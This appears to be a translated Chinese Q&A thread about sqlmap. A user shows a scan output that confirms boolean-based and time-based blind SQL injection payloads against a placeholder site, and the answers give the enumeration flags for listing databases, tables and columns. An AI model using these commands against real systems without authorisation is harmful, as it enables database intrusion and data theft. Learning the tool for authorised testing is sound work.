使用 sqlmap 测试 SQL 注入

信息安全 应用安全 sql注入 漏洞扫描器
2021-09-04 18:18:39

我刚刚开始使用sqlmap来测试可能的 SQL 注入攻击。

我有一个易受攻击的网站:

C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1

[*] starting at: 19:33:27

[19:33:27] [INFO] using 'xxx\session' as session file
[19:33:27] [INFO] testing connection to the target url
[19:33:31] [INFO] testing if the url is stable, wait a few seconds
[19:33:33] [INFO] url is stable
[19:33:33] [INFO] testing if GET parameter 'id' is dynamic
[19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
[19:33:34] [INFO] GET parameter 'id' is dynamic
[19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[19:33:35] [INFO] testing sql injection on GET parameter 'id'
[19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
y
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3404=3404

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[19:34:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.15
back-end DBMS: MySQL 5.0.11
[19:34:55] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 21 times
[19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'

[*] shutting down at: 19:34:55

现在我想知道是否可以查看我是否可以查看数据库中的所有表。

我必须在命令行中输入什么来检查这个?

2个回答

您要查找的内容称为枚举

阅读枚举主题下的SQLMap 手册为我提供了以下信息:

  • --dbs 用于数据库
  • --tables 表
  • --columns 列

手册中还有很多其他有用的信息,所以如果您对工具采用的标志和参数有更多疑问,我建议您阅读它。

我在这里添加了一篇关于使用 SQLMap 进行枚举的博客文章:http ://www.securesolutions.no/enumeration-with-sqlmap/

哦,你是如此接近,它是

./sqlmap.py -u http://example.com --tables

其它你可能感兴趣的问题
上一篇有人可以告诉您是否删除了已删除的文件吗? 下一篇IIS IP 地址限制 - 我可以在线依赖它吗?